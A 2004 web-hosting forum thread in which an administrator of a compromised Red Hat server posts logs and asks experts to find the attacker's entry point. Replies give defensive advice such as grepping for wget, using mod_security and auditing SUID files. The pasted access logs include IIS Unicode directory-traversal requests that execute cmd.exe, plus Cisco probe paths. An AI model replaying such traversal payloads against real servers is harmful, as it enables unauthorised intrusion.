Results 1 to 17 of 17
-
08-06-2004, 01:34 PM #1Web Hosting Guru
- Join Date
- Apr 2004
- Location
- India
- Posts
- 292
I need to find entrypoint of hacker into server !!Security experts can u help me?
Hello All,
I have a compromised server ... I have posted query for the same ...
Now my logwatch says this :
My xferlogs are saying:
--------------------- ftpd-xferlog Begin ------------------------
TOTAL KB IN: 119KB (0MB)
---------------------- ftpd-xferlog End --------
It seems that somebody uploaded something ...very little as 119KB ? Serious looking !!!
IMAPd] Logout stats:
====================
User | Logouts | Downloaded | Mbox Size
--------------------------------------- | ------- | ---------- | ----------
??? domain=??? | 161 | |
beth@pachak.com domain=pachak.com | 2 | |
jlong domain=s3tech.net | 3 | |
joel domain=swspeed.com | 12 | |
westerman@aknb.org domain=aknb.org | 3 | |
----------------------------------------------------------------------------
181 | 0 | 0
**Unmatched Entries**
Connection timed out, while reading line user=david@devianconsult.com host=pcp03161084pcs.parads01.nm.comca
st.net [68.35.41.63]: 1 Time(s)
Connection timed out, while reading line user=david@pachak.com host=pcp03161084pcs.parads01.nm.comcast.net
[68.35.41.63]: 1 Time(s)
Logout user=??? domain=??? host=UNKNOWN: 12 Time(s)
So many dropped packets:
--------------------- Kernel Begin ------------------------
Dropped 56 packets on interface eth0
From 61.110.238.96 - 5 packets to tcp(17300,17300,17300,17300,17300)
From 64.179.97.193 - 3 packets to tcp(2745)
From 69.39.92.168 - 3 packets to tcp(2745)
From 69.91.24.102 - 9 packets to tcp(1025,2745,6129)
From 69.137.65.77 - 3 packets to tcp(2745)
From 69.144.221.228 - 6 packets to tcp(1025,2745,6129)
From 69.167.198.187 - 4 packets to tcp(1025,2745,6129)
From 213.236.248.149 - 10 packets to tcp(4561,44464,4561,44464,4561,44464,4561,44464,4561,44464)
From 218.89.104.161 - 3 packets to tcp(5554,5554,9898)
From 221.143.42.23 - 10 packets to udp(1026,1026,1026,1026,1026)
Logged 10 packets on interface eth0
From 61.11.23.142 - 6 packets to tcp(22)
From 69.240.64.97 - 4 packets to tcp(22)
---------------------- Kernel End -------------------------
pam_unix says:
Unknown Entries:
2 more authentication failures; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=pcp09766260pcs.albqrq01.
nm.comcast.net user=admin: 1 Time(s)
-------------------------------------------------
VERY SERIOUS LINE:
PAM-listfile: Couldn't open /etc/ftpusers
hosting.hidefweb.com (bgp01383292bgs.montbl01.nm.comcast.net[68.35.140.209]) - PAM(ryan@swspeed.com): User not
known to the underlying authentication module.
-----------------------------------------------------
Now see some entries in access_log :
root@hosting [~]# cat /usr/local/apache/logs/access_log | grep -i "/../"
141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
141.158.23.68 - - [04/Apr/2004:13:08:55 -0600] "GET /level/99/exec/show%20conf HTTP/1.1" 400 409
208.41.103.26 - - [27/Jul/2004:18:14:09 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
208.41.103.26 - - [27/Jul/2004:18:18:14 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
208.41.103.26 - - [27/Jul/2004:18:21:11 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
208.41.103.26 - - [27/Jul/2004:18:24:04 -0600] "GET /msadc/../%e0/%80/%af../../%e0/%80/%af../../%e0/%80/%af../winnt/system32/cmd.exe/?/c/+dir+c: HTTP/1.1" 404 -
Security experts can u help me to find what is entry point?What must have gone wrong?
What should I do?
Any suggestion ?thelinophile
Thinking Different !!
-
08-06-2004, 01:56 PM #2Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Those are entry points for iis not linux.
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
08-06-2004, 01:58 PM #3Web Hosting Guru
- Join Date
- Mar 2003
- Location
- Rio de Janeiro - Brazil
- Posts
- 291
Re: I need to find entrypoint of hacker into server !!Security experts can u help me?
Originally posted by atul
Security experts can u help me?
-
08-06-2004, 01:59 PM #4Web Hosting Guru
- Join Date
- Mar 2003
- Location
- Rio de Janeiro - Brazil
- Posts
- 291
ops..., he replied first
-
08-06-2004, 02:00 PM #5Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
cd /usr/local/apache/domlogs
grep wget *Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
08-06-2004, 02:28 PM #6Web Hosting Master
- Join Date
- Dec 2001
- Posts
- 5,221
Greetings:
How do you know your server is compromised?
The command Steve wrote about will show if the hacker got in via Apache/PHP/Perl CGI, etc. using wget off of your server.
Properly configured, mod_security from http://www.modsecurity.org/ will protect against such attacks; and another good layer is to disable wget, similar programs, along with your compilers from access by everyone except root.
You may also want to review /var/log/secure and /var/log/messages.
Thank you.
-
08-06-2004, 02:44 PM #7Web Hosting Guru
- Join Date
- Apr 2004
- Location
- India
- Posts
- 292
Hello dynamiscnt,
Please look at this:
root@hosting [/var/tmp/ls]# ls
./ dynip.sh* iroffer.tar mybot.ignl.bkup mybot.xdcc README x.xdcc
../ iroffer* Makefile mybot.log mybot.xdcc.bkup sample.config
Configure* iroffer_chroot* Makefile.config mybot.log.2004-w28 mybot.xdcc.txt src/
COPYING iroffer.cron* mybot.ignl mybot.msg obj/ WHATSNEW
These were presents but i deleted thsese..
And Mr.Security How can u say that those are entrypoints of IIS and not of Linux..? I have RHE3 on server... and that is server is hacked ...
How can I check what is the damage?thelinophile
Thinking Different !!
-
08-06-2004, 03:17 PM #8Web Hosting Master
- Join Date
- Dec 2001
- Posts
- 5,221
Greetings:
The log entries you posted deal with attacks geared against IIS, not Linux. That's probably why Steve pointed out those particular log entries mean zero as it relates to your system and a compromise on your system.
I take it /tmp was not secured (nosuid, nonexec). Correct?
Did you check through your Apache access log files searching for "wget" as Steve suggested?
Thank you.
-
08-06-2004, 03:29 PM #9Web Hosting Guru
- Join Date
- Apr 2004
- Location
- India
- Posts
- 292
Hello ,
Did u see my logwatch I posted along with the access_log which u say is IIS attack !!
NO /tmp is already secured .. I mean before the attack !! and also quotas are enabled on it !!!
Please can u analyse the logwatch like dropped packets, or this
2 more authentication failures; logname= uid=0 euid=0 tty=NODEVssh ruser= rhost=pcp09766260pcs.albqrq01.
nm.comcast.net user=admin: 1 Time(s)
and this VERY SERIOUS
PAM-listfile: Couldn't open /etc/ftpusers
hosting.hidefweb.com (bgp01383292bgs.montbl01.nm.comcast.net[68.35.140.209]) - PAM(ryan@swspeed.com): User not
known to the underlying authentication module.
I think you haven't seen thses !! I think they are serious may help me to trace the entrypoint !!!
What do u suggest ??thelinophile
Thinking Different !!
-
08-06-2004, 03:38 PM #10Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Atul none of that is related to the attack you were given. IIS is a windows product not a linux product that is why i mentioned that means nothing since you are on linux aka redhat.
those logwatch entrys are a daily thing. You got to learn to live with them.
check out: http://rfxnetworks.com/bfd.php
Those scripts in your /var/tmp are not "harmful" they are bad but they will not compromise the root of the server. They are simply a irc bot used to distrubute files though dcc. Also known as a xdcc bot.
You entry point was probably a php script which has been mentioned to you many times in many posts but you seem to be ignoring them.Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
08-06-2004, 03:59 PM #11Web Hosting Guru
- Join Date
- Apr 2004
- Location
- India
- Posts
- 292
Hello Mr.Security,
I am very sorry if I said anything abrupt !!!
I dind't have any idea of those logwatch are safe to believe !!
Thanks for it !!
Yes I know U have mentioned that the entry point is php script..
and I have enabled safe mode in php.ini and also disable functions such as mentioned ...
So that php is already installed on server !!!What can I do for it?
Is there any way to find it ?
This is one more I wanted to show you about suid script
) SUID and SGID files found : ( find / \( -perm -004000 -o -perm -002000 \) -type f -print)
/home/invictus/public_html/postinfo.html
/home/invictus/public_html/.htaccess
/home/invictus/public_html/_vti_inf.html
/home/invictus/public_html/auth.php
/home/invictus/public_html/backend.php
/home/invictus/public_html/banners.php
/home/invictus/public_html/footer.php
/home/invictus/public_html/header.php
/home/invictus/public_html/index.php
/home/invictus/public_html/mainfile.php
/home/invictus/public_html/modules.php
/home/invictus/public_html/robots.txt
/home/invictus/public_html/ultramode.txt
/home/invictus/public_html/config.~php
find: /proc/27624/fd/4: No such file or directory
find: /proc/27624/fd/4: No such file or directory
/usr/sbin/usernetctl
/usr/sbin/utempter
/usr/sbin/exim
/usr/sbin/suexec
/usr/sbin/sendmail
/usr/sbin/gnome-pty-helper
/usr/bin/chage
/usr/bin/gpasswd
/usr/bin/wall
/usr/bin/passwd
/usr/bin/at
/usr/bin/quota
/usr/bin/crontab
/usr/bin/lppasswd
/usr/libexec/openssh/ssh-keysign
/usr/local/urchin/bin/urchind
/usr/local/urchin/util/geo-update
/usr/local/urchin/util/u3importer
/usr/local/urchin/util/uconf-driver
/usr/local/urchin/util/uconf-export
/usr/local/urchin/util/uconf-import
/usr/local/urchin/util/uconf-schedule
/usr/local/urchin/util/udb-sanitizer
/usr/local/apache/bin/suexec
/usr/local/cpanel/bin/cpwrap
/usr/local/cpanel/bin/jailshell
/usr/local/cpanel/3rdparty/mailman/mail/mailman
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admindb
/usr/local/cpanel/3rdparty/mailman/cgi-bin/admin
/usr/local/cpanel/3rdparty/mailman/cgi-bin/confirm
/usr/local/cpanel/3rdparty/mailman/cgi-bin/edithtml
/usr/local/cpanel/3rdparty/mailman/cgi-bin/listinfo
/usr/local/cpanel/3rdparty/mailman/cgi-bin/options
/usr/local/cpanel/3rdparty/mailman/cgi-bin/private
/usr/local/cpanel/3rdparty/mailman/cgi-bin/rmlist
/usr/local/cpanel/3rdparty/mailman/cgi-bin/roster
/usr/local/cpanel/3rdparty/mailman/cgi-bin/subscribe
/usr/local/cpanel/cgi-sys/scgiwrap
/bin/su
/sbin/pam_timestamp_check
/sbin/pwdb_chkpwd
/sbin/unix_chkpwd
/sbin/netreport
I had disable wget to 700 already before the attack ..
Do u see anything flase in those list?
THank Mr.Security!! I have all faith in you !!
THanks again!!thelinophile
Thinking Different !!
-
08-06-2004, 04:10 PM #12Retired Moderator
- Join Date
- Jul 2001
- Location
- Singapore
- Posts
- 1,889
FYI, to check or monitor for s[ug]id files... use sXid which is good
http://freshmeat.net/projects/sxid/Giam Teck Choon
:: Join choon.net Community today to share your tips and tricks on server issues please ::
:: Singapore Dedicated Servers :: Singapore Virtual Private Servers :: Linux/FreeBSD Server Management ::
-
08-06-2004, 04:54 PM #13Web Hosting Guru
- Join Date
- Apr 2004
- Location
- India
- Posts
- 292
Hello All,
The sxid logs say this:
I think according to Mr.Security ,some php script is the problem
I think it could be one of them :
#sxid
/home/invictus/public_html/config.~php^^32039^^32040^^36863^^1618916^^e417e7c1f4d43bd60f4d3fe5e4c3d32d
/home/invictus/public_html/ultramode.txt^^32039^^32040^^36863^^1618914^^bdbb17421e5d5f4c24b611e86ade522e
/home/invictus/public_html/robots.txt^^32039^^32040^^36863^^1618913^^089023af5da43c852e4d4d59c0ec3a9e
/home/invictus/public_html/modules.php^^32039^^32040^^36863^^1618912^^41c871826e334e9470422adf665e1f81
/home/invictus/public_html/mainfile.php^^32039^^32040^^36863^^1618911^^aefa54854aeb1000e897133a672c3199
/home/invictus/public_html/index.php^^32039^^32040^^36863^^1618910^^e49bff767016bc21d2dcabfd799b358d
/home/invictus/public_html/header.php^^32039^^32040^^36863^^1618908^^218bd1bac6599961d5727b9b744ec92d
/home/invictus/public_html/footer.php^^32039^^32040^^36863^^1618907^^cdf7efd8e351ef1e5bb560d73abbbc0d
/home/invictus/public_html/banners.php^^32039^^32040^^36863^^1618905^^748fa745809248efd600ca7c313ac6d4
/home/invictus/public_html/backend.php^^32039^^32040^^36863^^1618904^^b731b8db128bcda3b36a1c0cdbf0fe7d
/home/invictus/public_html/auth.php^^32039^^32040^^36863^^1618903^^624b56edae07c3f407facee7aaf6eafe
/home/invictus/public_html/_vti_inf.html^^32039^^32040^^36863^^1618902^^5721e16914007736f8611fdd96ef0723
/home/invictus/public_html/.htaccess^^32039^^32040^^36863^^1618899^^76eed586c54af24744ed41a3597d0afe
/home/invictus/public_html/postinfo.html^^32039^^32040^^36863^^1618900^^1ccbd6660460154debbd1c011290722thelinophile
Thinking Different !!
-
08-06-2004, 06:46 PM #14Problem Solver
- Join Date
- Mar 2003
- Location
- California USA
- Posts
- 13,681
Thats no problem ^^
Steven Ciaburri | Industry's Best Server Management - Rack911.com
Software Auditing - 400+ Vulnerabilities Found - Quote @ https://www.RACK911Labs.com
Fully Managed Dedicated Servers (Las Vegas, New York City, & Amsterdam) (AS62710)
FreeBSD & Linux Server Management, Security Auditing, Server Optimization, PCI Compliance
-
08-06-2004, 06:55 PM #15Web Hosting Guru
- Join Date
- Apr 2004
- Location
- India
- Posts
- 292
Hello Mr.Security,
May I know how do u say that? These are the only php suid scripts found to be doubtful !!!
What is that output mean? Can u please mention in brief?
Where and how should I look for false .php script? How should I check the damage happened to system?
Thanks once again!thelinophile
Thinking Different !!
-
08-06-2004, 07:06 PM #16Web Hosting Master
- Join Date
- Dec 2001
- Posts
- 5,221
Greetings:
Did you check through your Apache access log files searching for "wget" as Steve suggested?
Thank you.
-
08-06-2004, 07:35 PM #17Web Hosting Master
- Join Date
- Apr 2003
- Location
- NC
- Posts
- 3,093
If you want help you are going to have to listen to what others have said...the wget thing is a very common entry method and the first thing to check.
John W, CISSP, C|EH
MS Information Security and Assurance
ITEagleEye.com - Server Administration and Security
Yawig.com - Managed VPS and Dedicated Servers with VIP Service